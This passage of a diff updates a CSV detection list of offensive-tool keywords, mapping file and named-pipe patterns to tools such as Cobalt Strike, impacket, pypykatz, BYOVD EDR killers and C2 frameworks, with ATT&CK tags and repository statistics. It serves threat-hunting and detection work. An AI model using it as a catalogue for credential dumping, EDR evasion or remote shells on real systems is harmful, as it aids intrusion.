Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1554","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" -"*\\\\.\\aswSP_Avar*","offensive_tool_keyword","BYOVD_kill_av_edr","BYOD to kill AV/EDR","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/BYOVD_kill_av_edr.c","1","0","N/A","10","3","228","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" +"*\\\\*\\*\\Get-FileLockProcess.ps1*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z" +"*\\\\.\\aswSP_Avar*","offensive_tool_keyword","BYOVD_kill_av_edr","BYOD to kill AV/EDR","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/BYOVD_kill_av_edr.c","1","0","N/A","10","3","229","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" "*\\\\.\\pipe\\mal*","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","114","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" -"*\\\\.\\pipe\\warpzone8*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" -"*\\\\127.0.0.1\\pipe\\warpzone8*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","271","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" -"*\\127.0.0.1\c$*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*\\\\.\\pipe\\warpzone8*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*\\\\127.0.0.1\\pipe\\warpzone8*","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","3","272","33","2023-08-17T02:45:17Z","2023-06-10T03:30:59Z" +"*\\127.0.0.1\c$*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*\\c$\Windows\Temp\*.dmp*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*\\DCSC_stdInPipe*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","1","97","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" -"*\\DCSC_stdOutPipe*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","1","97","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*\\DCSC_stdInPipe*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" +"*\\DCSC_stdOutPipe*","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","1","98","14","2023-08-27T13:12:39Z","2023-08-25T15:18:30Z" "*\\GetWebDAVStatus.exe*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" "*\\pipe\\DAV RPC SERVICE*","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","0","N/A","10","10","81","18","2021-09-29T17:40:52Z","2021-09-29T17:31:21Z" "*\1.Encrypt_shellcode*","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","0","N/A","10","2","147","22","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z" -"*\8e8988b257e9dd2ea44ff03d44d26467b7c9ec16*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" -"*\AbandonedCOMKeys.*","offensive_tool_keyword","AbandonedCOMKeys","Enumerates abandoned COM keys (specifically InprocServer32). Useful for persistence","T1547.011 - T1049 - T1087.002","TA0005 - TA0007 - TA0003","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\8e8988b257e9dd2ea44ff03d44d26467b7c9ec16*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*\AbandonedCOMKeys.*","offensive_tool_keyword","AbandonedCOMKeys","Enumerates abandoned COM keys (specifically InprocServer32). Useful for persistence","T1547.011 - T1049 - T1087.002","TA0005 - TA0007 - TA0003","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\adcs.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\ADCSPwn*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","0","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" +"*\add_computer.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\ADFSpoof.py*","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","0","N/A","10","4","300","52","2023-09-21T17:14:52Z","2019-03-20T22:30:58Z" -"*\ADFSpray*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","75","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" +"*\ADFSpray*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "*\adm2sys.py*","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","0","N/A","9","1","10","6","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" -"*\admin-panels.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*\admin-panels.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*\agent_exe.exe*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*\alan.log*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*\Alan.v*.zip*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*\Alcatraz.exe*","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1345","219","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" -"*\All_attack.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*\All_attack.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*\Andrew.dmp*","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","0","N/A","10","4","370","101","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" "*\AntiSandbox.go*","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","10","0","2","2023-09-11T10:20:41Z","2023-08-31T09:36:38Z" "*\AntiSandbox.go*","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","0","N/A","10","10","5","2","2023-08-31T12:06:58Z","2023-08-13T11:04:20Z" @@ -5971,31 +6044,32 @@ "*\Apollo.exe*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*\asm\x64\alter_pe_sections*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" "*\asm\x86\alter_pe_sections*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" -"*\Athena-*.zip*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*\Athena-*.zip*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*\AtomLdr\x64*","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/NUL0x4C/AtomLdr","1","0","N/A","N/A","6","543","78","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z" -"*\AutoSmuggle\*.cs*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","2","141","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" +"*\AutoSmuggle\*.cs*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z" "*\autotimeline*","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","1","N/A","N/A","2","119","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z" "*\avetdbg.txt*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" -"*\avred.py*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","172","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" -"*\avred.py*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*\avredweb.py *","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","172","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*\avred.py*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" +"*\avred.py*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*\avredweb.py *","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*\AzureC2Proxy\*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*\AzureC2Relay*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*\AzureHound.ps1*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*\BabelStrike.py*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","0","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z" -"*\backdoored\*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*\backdoored\*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" "*\BackupOperatorToDA*","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","0","N/A","10","4","335","48","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" "*\BadZure*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","0","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z" -"*\basicKitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - 